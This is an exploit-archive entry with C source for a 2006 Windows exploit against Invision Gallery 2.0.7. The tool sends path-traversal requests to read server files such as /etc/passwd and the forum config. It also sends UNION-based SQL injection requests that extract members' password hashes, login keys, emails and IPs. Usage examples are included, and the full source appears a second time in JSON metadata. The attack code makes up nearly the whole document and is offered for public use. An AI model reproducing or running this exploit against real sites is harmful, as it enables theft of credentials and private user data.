Search...

Invision Gallery 2.0.7 - readfile() SQL Injection

2006-10-03T00:00:00

ID EXPLOITPACK:631E9E94210D781DF25EBD39B674E4D5
Type exploitpack
Reporter 1nf3ct0r
Modified 2006-10-03T00:00:00

Description

Invision Gallery 2.0.7 - readfile() SQL Injection

                                        
                                            /*
     _  _     _ _ _  __     _      _   _
    | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
    | __ / -_) | | ' &lt;| ' \| / _` | ' \  _(_-&lt;
    |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/
      hellknights.void.ru    |___/  
                 (c)oded by _1nf3ct0r_

 Invision Gallery =&gt; 2.0.7 ReadFile() & SQL injection exploit
 
+-------------+
|   Uzage:    |
+-------------+
[+] ReadFile():
  - syntax:
  readfile 1 &lt;host&gt; &lt;pathtoindex&gt; &lt;localfile&gt; 
  readfile 2 &lt;host&gt; &lt;pathtoindex&gt; &lt;localfile&gt;  // try it if readfile[1] failed ;)
   - params: 
  &lt;localfile&gt; -  path to local file (../file), for example: ../../../../../etc/passwd
   s0, if u want to get local path to IPB try this: ../../hellknightscrewxploit :) 
   - examples:
   readfile 1 asd.ru index.php ../../../../../../etc/passwd
   readfile 1 asd.ru forum/index.php ../../conf_global.php
   readfile 1 asd.ru forum/index.php ../../conf_global.php%00
   
[+] SQL-injection:
  - syntax
  sqlinject &lt;host&gt; &lt;pathtoindex&gt; &lt;member_id&gt; &lt;prefix&gt; &lt;column&gt; &lt;table&gt;
  getprefix &lt;host&gt; &lt;pathtoindex&gt;   // get database prefix from IPB error :) 
  - params:
  &lt;member_id&gt; -  member's id for SQL-injection result, for example: 1
  &lt;column&gt;    -  ipb members' column to get. for example: ip_adress, email.
  &lt;table&gt;     -  ipb table to use. for example: member
  &lt;prefix&gt;    -  database prefix. 
  - examples:
  ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1  
  ig.exe sqlinject asd.ru index.php member_login_key  ibf_ members 1
  ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5
  
[~] sorry, but i`m too lazy 2 optimize this c0de... 
[~] Music: Orbital - Halcyon and On and On (OST Hackers) :) 
[~] compiled with LCC without any warnings

Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team 
             itz public c0de n0w, have phun :&gt; 
*/

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;winsock2.h&gt;

DWORD resolve(char *host)
{
    DWORD ret = 0;
    struct hostent * hp = gethostbyname(host);
    if (!hp) ret = inet_addr(host);
    if ((!hp)&&(ret == INADDR_NONE)) return 0;
    if (hp != NULL) memcpy((void*)&ret, hp-&gt;h_addr,hp-&gt;h_length);
    return ret;
}

int Exploit(char * sendbuffer, char * mode, char * host)
{
	char recvbuffer[10024]; char * temp; 
	memset(recvbuffer,0,10024);

	SOCKET s = socket(AF_INET,SOCK_STREAM,0);
	SOCKADDR_IN webaddr;
		webaddr.sin_addr.S_un.S_addr = resolve(host);
		webaddr.sin_family = AF_INET;
		webaddr.sin_port = htons(80);
	if(connect(s, (struct sockaddr *)&webaddr,sizeof(SOCKADDR_IN))) return -1;
	send(s, sendbuffer, strlen(sendbuffer),0);
	
	int i, j;
	while(i = recv(s,recvbuffer+strlen(recvbuffer),1,0)) 
	for(int i = 0; recvbuffer[i]!=0; ++i)
	{
		if((recvbuffer[i]=='\r')&&(recvbuffer[i+1]=='\n')&&
			(recvbuffer[i+2]=='\r')&&(recvbuffer[i+3]=='\n'))
		{temp = (char*)&recvbuffer[i] + 4;break;}
	}
	
	
	if(strcmp(mode,"readfile")==0)
	{
	printf("\n [+] Exploit Result:\n\n%s", temp);
	return 0;
	}
	
	if(strcmp(mode,"sqlinject")==0)
	{		
	char * token = NULL; char * injected = NULL; char * parse = NULL;
    token = strtok(temp, "="); 
	token = strtok(NULL, "=");
	token = strtok(NULL, "&");
	token = strtok(NULL, "&");
	for(int j = 0; j &lt; 2; j++)
		{
    	token = strtok(NULL, "&");
	    if(j==1){ injected = token; printf("\n [+] Exploit Result:\n\n%s", injected); }
		}

	} else { printf("\n[-] some error. change MODE param\n"); return 0; } 
	return 0;
}

int main(int argc,char * argv[])
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2),&wsaData);

		printf("\n ...............................................................\n");
        printf("  Invision Gallery 2.0.7 ReadFile() & SQL injection exploit       \n");
        printf("         (c)oded by _1nf3ct0r_ // Hell Knights Crew               \n");
		printf("               http://hellknights.void.ru/                        \n");
		printf("  Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team   \n");
		printf(" ...............................................................  \n");
		
	if (argc == 1) {

printf("\n\n [+] ReadFile():\n");
printf("  - syntax:\n");
printf("  readfile 1 &lt;host&gt; &lt;pathtoindex&gt; &lt;localfile&gt; \n");
printf("  readfile 2 &lt;host&gt; &lt;pathtoindex&gt; &lt;localfile&gt;   -- try it 1f readfile[1] failed \n");
printf("  - params: \n");
printf("  &lt;localfile&gt; -  path to local file (../file), f0r example: ../../../../../etc/passwd\n");
printf("  s0, 1f u want to get local path to IPB 7ry th1s: ../../hellknightscrewxploit  \n");
printf("  - examples:\n");
printf("  readfile 1 asd.ru index.php ../../../../../../etc/passwd\n");
printf("  readfile 1 asd.ru forum/index.php ../../conf_global.php\n");
printf("  readfile 1 asd.ru forum/index.php ../../conf_global.php%00\n\n\n");
printf(" [+] SQL-injection:\n");
printf("  - syntax\n");
printf("  sqlinject &lt;host&gt; &lt;pathtoindex&gt; &lt;member_id&gt; &lt;prefix&gt; &lt;column&gt; &lt;table&gt;\n");
printf("  getprefix &lt;host&gt; &lt;pathtoindex&gt;   -- get database prefix from IPB error  \n");
printf("  - params:\n");
printf("  &lt;member_id&gt; -  member's id for SQL-injection result, for example: 1\n");
printf("  &lt;column&gt;    -  ipb members' column to get. for example: ip_adress, email.\n");
printf("  &lt;table&gt;     -  ipb table to use. f0r example: member\n");
printf("  &lt;prefix&gt;    -  database prefix. \n");
printf("  - examples:\n");
printf("  ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1  \n");
printf("  ig.exe sqlinject asd.ru index.php member_login_key  ibf_ members 1\n");
printf("  ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5\n\n");
		           return 1;
	               }
	
char * mode = argv[1];


// --- readfile() exploit --- //
if (strcmp(mode,"readfile")==0)
{ 
char * type = argv[2];
char * path = NULL; path = argv[4];
char * localfile = argv[5];
char * host = argv[3]; 
	if (strcmp(type,"1")==0)
	{
	char exploit[1024]; 
	strcpy(exploit, "GET /"); 
	strcat(exploit, path); 
	strcat(exploit, "?act=module&module=gallery&cmd=viewimage&img=&file_type=&dir=");
	strcat(exploit, localfile);
    strcat(exploit, " HTTP/1.0\r\nHost: ");
	strcat(exploit, host); 
	strcat(exploit, "\r\n\r\n"); 
Exploit(exploit, "readfile", host);

	} 
	else if (strcmp(type,"2")==0)
	{
	char exploit[1024]; 
	strcpy(exploit, "GET /"); 
	strcat(exploit, path); 
	strcat(exploit, "?act=gallery&code=viewimage&img=index.gif&dir=");
	strcat(exploit, localfile);
    strcat(exploit, " HTTP/1.0\r\nHost: ");
	strcat(exploit, host); 
	strcat(exploit, "\r\n\r\n"); 
Exploit(exploit, "readfile", host);
	}

// --- sql-injection exploit --- //
} 
if(strcmp(mode,"sqlinject")==0)
{
char * host = argv[2]; 
char * path = argv[3];
char * prefix = argv[5];
char * column = argv[4];
char * table = argv[6];
char * id = argv[7];

	char exploit[1024]; 
	strcpy(exploit, "GET /"); 
	strcat(exploit, path); 
	strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,");
	strcat(exploit, column);
	strcat(exploit, ",1,1,1,1,1,1,1,1%20FROM%20");
	strcat(exploit, prefix);
	strcat(exploit, table);
	strcat(exploit, "%20WHERE%20id=");
	strcat(exploit, id);
	strcat(exploit, "/*31337*/");
    strcat(exploit, " HTTP/1.0\r\nHost: ");
	strcat(exploit, host); 
	strcat(exploit, "\r\n\r\n"); 
    Exploit(exploit, "sqlinject", host);
} 
if (strcmp(mode,"getprefix")==0)
{ 
char * path = argv[3];
char * host = argv[2]; 
	char exploit[1024]; 
	strcpy(exploit, "GET /"); 
	strcat(exploit, path); 
	strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew");
    strcat(exploit, " HTTP/1.0\r\nHost: ");
	strcat(exploit, host); 
	strcat(exploit, "\r\n\r\n"); 
printf("\n\n\n[!] u can get database prefix from this error. example: SELECT * FROM &lt;PREFIX&gt;gallery_albums\n\n");
Exploit(exploit, "readfile", host);
}

WSACleanup();
	return 0;
}

// milw0rm.com [2006-10-03]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:21", "references": [], "description": "\nInvision Gallery 2.0.7 - readfile() SQL Injection", "edition": 1, "reporter": "1nf3ct0r", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2006-10-03T00:00:00", "title": "Invision Gallery 2.0.7 - readfile() SQL Injection", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:21", "rev": 2}, "score": {"value": 0.7, "vector": "NONE", "modified": "2020-04-01T19:04:21", "rev": 2}, "vulnersScore": 0.7}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-10-03T00:00:00", "id": "EXPLOITPACK:631E9E94210D781DF25EBD39B674E4D5", "href": "", "viewCount": 1, "sourceData": "/*\n _ _ _ _ _ __ _ _ _\n | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___\n | __ / -_) | | ' <| ' \\| / _` | ' \\ _(_-<\n |_||_\\___|_|_|_|\\_\\_||_|_\\__, |_||_\\__/__/\n hellknights.void.ru |___/ \n (c)oded by _1nf3ct0r_\n\n Invision Gallery => 2.0.7 ReadFile() & SQL injection exploit\n \n+-------------+\n| Uzage: |\n+-------------+\n[+] ReadFile():\n - syntax:\n readfile 1 <host> <pathtoindex> <localfile> \n readfile 2 <host> <pathtoindex> <localfile> // try it if readfile[1] failed ;)\n - params: \n <localfile> - path to local file (../file), for example: ../../../../../etc/passwd\n s0, if u want to get local path to IPB try this: ../../hellknightscrewxploit :) \n - examples:\n readfile 1 asd.ru index.php ../../../../../../etc/passwd\n readfile 1 asd.ru forum/index.php ../../conf_global.php\n readfile 1 asd.ru forum/index.php ../../conf_global.php%00\n \n[+] SQL-injection:\n - syntax\n sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>\n getprefix <host> <pathtoindex> // get database prefix from IPB error :) \n - params:\n <member_id> - member's id for SQL-injection result, for example: 1\n <column> - ipb members' column to get. for example: ip_adress, email.\n <table> - ipb table to use. for example: member\n <prefix> - database prefix. \n - examples:\n ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1 \n ig.exe sqlinject asd.ru index.php member_login_key ibf_ members 1\n ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5\n \n[~] sorry, but i`m too lazy 2 optimize this c0de... \n[~] Music: Orbital - Halcyon and On and On (OST Hackers) :) \n[~] compiled with LCC without any warnings\n\nGr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team \n itz public c0de n0w, have phun :> \n*/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <winsock2.h>\n\nDWORD resolve(char *host)\n{\n DWORD ret = 0;\n struct hostent * hp = gethostbyname(host);\n if (!hp) ret = inet_addr(host);\n if ((!hp)&&(ret == INADDR_NONE)) return 0;\n if (hp != NULL) memcpy((void*)&ret, hp->h_addr,hp->h_length);\n return ret;\n}\n\nint Exploit(char * sendbuffer, char * mode, char * host)\n{\n\tchar recvbuffer[10024]; char * temp; \n\tmemset(recvbuffer,0,10024);\n\n\tSOCKET s = socket(AF_INET,SOCK_STREAM,0);\n\tSOCKADDR_IN webaddr;\n\t\twebaddr.sin_addr.S_un.S_addr = resolve(host);\n\t\twebaddr.sin_family = AF_INET;\n\t\twebaddr.sin_port = htons(80);\n\tif(connect(s, (struct sockaddr *)&webaddr,sizeof(SOCKADDR_IN))) return -1;\n\tsend(s, sendbuffer, strlen(sendbuffer),0);\n\t\n\tint i, j;\n\twhile(i = recv(s,recvbuffer+strlen(recvbuffer),1,0)) \n\tfor(int i = 0; recvbuffer[i]!=0; ++i)\n\t{\n\t\tif((recvbuffer[i]=='\\r')&&(recvbuffer[i+1]=='\\n')&&\n\t\t\t(recvbuffer[i+2]=='\\r')&&(recvbuffer[i+3]=='\\n'))\n\t\t{temp = (char*)&recvbuffer[i] + 4;break;}\n\t}\n\t\n\t\n\tif(strcmp(mode,\"readfile\")==0)\n\t{\n\tprintf(\"\\n [+] Exploit Result:\\n\\n%s\", temp);\n\treturn 0;\n\t}\n\t\n\tif(strcmp(mode,\"sqlinject\")==0)\n\t{\t\t\n\tchar * token = NULL; char * injected = NULL; char * parse = NULL;\n token = strtok(temp, \"=\"); \n\ttoken = strtok(NULL, \"=\");\n\ttoken = strtok(NULL, \"&\");\n\ttoken = strtok(NULL, \"&\");\n\tfor(int j = 0; j < 2; j++)\n\t\t{\n \ttoken = strtok(NULL, \"&\");\n\t if(j==1){ injected = token; printf(\"\\n [+] Exploit Result:\\n\\n%s\", injected); }\n\t\t}\n\n\t} else { printf(\"\\n[-] some error. change MODE param\\n\"); return 0; } \n\treturn 0;\n}\n\nint main(int argc,char * argv[])\n{\nWSADATA wsaData;\nWSAStartup(MAKEWORD(2,2),&wsaData);\n\n\t\tprintf(\"\\n ...............................................................\\n\");\n printf(\" Invision Gallery 2.0.7 ReadFile() & SQL injection exploit \\n\");\n printf(\" (c)oded by _1nf3ct0r_ // Hell Knights Crew \\n\");\n\t\tprintf(\" http://hellknights.void.ru/ \\n\");\n\t\tprintf(\" Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team \\n\");\n\t\tprintf(\" ............................................................... \\n\");\n\t\t\n\tif (argc == 1) {\n\nprintf(\"\\n\\n [+] ReadFile():\\n\");\nprintf(\" - syntax:\\n\");\nprintf(\" readfile 1 <host> <pathtoindex> <localfile> \\n\");\nprintf(\" readfile 2 <host> <pathtoindex> <localfile> -- try it 1f readfile[1] failed \\n\");\nprintf(\" - params: \\n\");\nprintf(\" <localfile> - path to local file (../file), f0r example: ../../../../../etc/passwd\\n\");\nprintf(\" s0, 1f u want to get local path to IPB 7ry th1s: ../../hellknightscrewxploit \\n\");\nprintf(\" - examples:\\n\");\nprintf(\" readfile 1 asd.ru index.php ../../../../../../etc/passwd\\n\");\nprintf(\" readfile 1 asd.ru forum/index.php ../../conf_global.php\\n\");\nprintf(\" readfile 1 asd.ru forum/index.php ../../conf_global.php%00\\n\\n\\n\");\nprintf(\" [+] SQL-injection:\\n\");\nprintf(\" - syntax\\n\");\nprintf(\" sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>\\n\");\nprintf(\" getprefix <host> <pathtoindex> -- get database prefix from IPB error \\n\");\nprintf(\" - params:\\n\");\nprintf(\" <member_id> - member's id for SQL-injection result, for example: 1\\n\");\nprintf(\" <column> - ipb members' column to get. for example: ip_adress, email.\\n\");\nprintf(\" <table> - ipb table to use. f0r example: member\\n\");\nprintf(\" <prefix> - database prefix. \\n\");\nprintf(\" - examples:\\n\");\nprintf(\" ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1 \\n\");\nprintf(\" ig.exe sqlinject asd.ru index.php member_login_key ibf_ members 1\\n\");\nprintf(\" ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5\\n\\n\");\n\t\t return 1;\n\t }\n\t\nchar * mode = argv[1];\n\n\n// --- readfile() exploit --- //\nif (strcmp(mode,\"readfile\")==0)\n{ \nchar * type = argv[2];\nchar * path = NULL; path = argv[4];\nchar * localfile = argv[5];\nchar * host = argv[3]; \n\tif (strcmp(type,\"1\")==0)\n\t{\n\tchar exploit[1024]; \n\tstrcpy(exploit, \"GET /\"); \n\tstrcat(exploit, path); \n\tstrcat(exploit, \"?act=module&module=gallery&cmd=viewimage&img=&file_type=&dir=\");\n\tstrcat(exploit, localfile);\n strcat(exploit, \" HTTP/1.0\\r\\nHost: \");\n\tstrcat(exploit, host); \n\tstrcat(exploit, \"\\r\\n\\r\\n\"); \nExploit(exploit, \"readfile\", host);\n\n\t} \n\telse if (strcmp(type,\"2\")==0)\n\t{\n\tchar exploit[1024]; \n\tstrcpy(exploit, \"GET /\"); \n\tstrcat(exploit, path); \n\tstrcat(exploit, \"?act=gallery&code=viewimage&img=index.gif&dir=\");\n\tstrcat(exploit, localfile);\n strcat(exploit, \" HTTP/1.0\\r\\nHost: \");\n\tstrcat(exploit, host); \n\tstrcat(exploit, \"\\r\\n\\r\\n\"); \nExploit(exploit, \"readfile\", host);\n\t}\n\n// --- sql-injection exploit --- //\n} \nif(strcmp(mode,\"sqlinject\")==0)\n{\nchar * host = argv[2]; \nchar * path = argv[3];\nchar * prefix = argv[5];\nchar * column = argv[4];\nchar * table = argv[6];\nchar * id = argv[7];\n\n\tchar exploit[1024]; \n\tstrcpy(exploit, \"GET /\"); \n\tstrcat(exploit, path); \n\tstrcat(exploit, \"?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,\");\n\tstrcat(exploit, column);\n\tstrcat(exploit, \",1,1,1,1,1,1,1,1%20FROM%20\");\n\tstrcat(exploit, prefix);\n\tstrcat(exploit, table);\n\tstrcat(exploit, \"%20WHERE%20id=\");\n\tstrcat(exploit, id);\n\tstrcat(exploit, \"/*31337*/\");\n strcat(exploit, \" HTTP/1.0\\r\\nHost: \");\n\tstrcat(exploit, host); \n\tstrcat(exploit, \"\\r\\n\\r\\n\"); \n Exploit(exploit, \"sqlinject\", host);\n} \nif (strcmp(mode,\"getprefix\")==0)\n{ \nchar * path = argv[3];\nchar * host = argv[2]; \n\tchar exploit[1024]; \n\tstrcpy(exploit, \"GET /\"); \n\tstrcat(exploit, path); \n\tstrcat(exploit, \"?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew\");\n strcat(exploit, \" HTTP/1.0\\r\\nHost: \");\n\tstrcat(exploit, host); \n\tstrcat(exploit, \"\\r\\n\\r\\n\"); \nprintf(\"\\n\\n\\n[!] u can get database prefix from this error. example: SELECT * FROM <PREFIX>gallery_albums\\n\\n\");\nExploit(exploit, \"readfile\", host);\n}\n\nWSACleanup();\n\treturn 0;\n}\n\n// milw0rm.com [2006-10-03]", "cvss": {"score": 0.0, "vector": "NONE"}}